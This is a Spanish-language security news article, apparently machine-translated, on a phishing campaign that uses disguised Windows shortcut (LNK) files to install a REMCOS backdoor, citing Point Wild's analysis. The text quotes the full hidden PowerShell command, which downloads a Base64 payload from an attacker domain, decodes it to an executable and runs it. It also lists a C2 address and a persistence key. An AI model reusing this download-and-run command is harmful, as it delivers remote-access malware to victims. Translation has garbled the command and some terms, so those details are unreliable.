Los ciberdelincuentes están aprovechando cada vez más archivos de acceso directo de Windows (LNK) para implementar puertas traseras sofisticadas, con una nueva campaña que ofrece una variante REMCOS avanzada que evade con éxito los mecanismos tradicionales de detección antivirus.
Este ataque de varias etapas demuestra la sofisticación en evolución de los actores de amenaza que explotan la funcionalidad legítima de Windows para establecer un punto de apoyo persistente en los sistemas específicos.
La campaña comienza con tácticas de ingeniería social, distribuyendo archivos LNK disfrazados de documentos legítimos, como facturas o órdenes de compra.
Estos archivos llevan nombres inocuos como “Ordine-Di-acquist-7263535” y aparecen como documentos estándar para usuarios desprevenidos.
Sin embargo, debajo de esta fachada se encuentra una compleja cadena de infecciones que aprovecha los comandos de PowerShell, la codificación Base64 y las técnicas de ejecución sin archivo para entregar la carga útil de la puerta trasera REMCOS.
Flujo de trabajo de infección (fuente – Point Wild)
Analistas de Point Wild identificado Esta variante particular a través del análisis de comportamiento integral, que revela su capacidad para evitar múltiples capas de controles de seguridad a través de técnicas de ofuscación sofisticadas.
Las capacidades sigilosas del malware se derivan de su abuso de procesos legítimos de Windows y su colocación estratégica de componentes maliciosos dentro de los directorios de sistemas de confianza.
El ataque se inicia cuando los usuarios hacen doble clic en el archivo LNK aparentemente inofensivo, que inmediatamente desencadena una ejecución oculta de PowerShell.
Ruta de destino del archivo LNK (Fuente – Point Wild)
En lugar de mostrar advertencias macro típicas de los documentos de oficina maliciosa, los archivos LNK se ejecutan en silencio, haciéndolas particularmente peligrosas para los usuarios finales.
El comando PowerShell integrado establece la base de toda la cadena de infecciones a través de una secuencia cuidadosamente orquestada de descargas de archivos y operaciones de decodificación.
Mecanismo de infección avanzado e implementación de la carga útil
La sofisticación técnica de esta variante REMCOS se hace evidente a través de su mecanismo de infección en varias etapas.
El archivo LNK inicial contiene un extenso comando PowerShell que permanece en gran medida invisible para los usuarios debido a las limitaciones de la pantalla de la propiedad de Windows.
Contenido del archivo LNK (fuente – Point Wild)
El comando completo ejecuta tres operaciones distintas en rápida sucesión:-
C: \ Windows \ System32 \ WindowsPowershell \ V1.0 \ Powershell.exe -WindowStyle Hidden -command (new -object System.net.webclient) .downloadfile (‘https://shipping-hr.ro/m/r.txt’,’c:\programdata\\hew.gif’); $ file = “c: \\ ProgramData \\ Hew.gif”; (System.Convert) :: FromBase64String ((Get-Content $ File)) | Set -contento c: \\ programaData \\ chrome.pif -Encoding byte; Iniciar C: \\ ProgramData \\ Chrome.pif
La primera etapa descarga una carga útil codificada de Base64 del servidor de comando y control en Shipping-Hr.R.Ro, disfrazando el contenido malicioso como un archivo de imagen llamado Hew.gif.
Esta técnica de ofuscación ayuda a evadir las soluciones de monitoreo de red que podrían marcar descargas ejecutables sospechosas.
La segunda etapa realiza una decodificación de base 64 en memoria, convirtiendo el contenido de texto en un ejecutable binario llamado Chrome.pif, eligiendo deliberadamente un nombre de archivo que sugiere una funcionalidad legítima del navegador Chrome.
La carga útil final, Chrome.pif, representa un sofisticado trasero REMCOS compilado como un ejecutable portátil utilizando Borland Delphi 4.0.
Tras la ejecución, establece la persistencia a través de modificaciones de registro bajo la clave “8917161-B37E3P” y crea un sistema de keylogging integral que utiliza la función de la API setWindowshookexa.
El malware mantiene la comunicación de comando y control con la infraestructura rumana en la dirección IP 92.82.184.33, permitiendo las capacidades de acceso remoto que incluyen transferencia de archivos, ejecución de comandos y funciones de vigilancia.
Esta campaña ejemplifica el panorama de amenazas actual, donde los atacantes combinan con éxito la ingeniería social con métodos avanzados de evasión técnica, lo que hace que la detección tradicional basada en la firma sea cada vez más ineficaz contra las variantes modernas de malware.
Integre cualquiera. Pruebe 50 búsquedas de prueba gratuitas
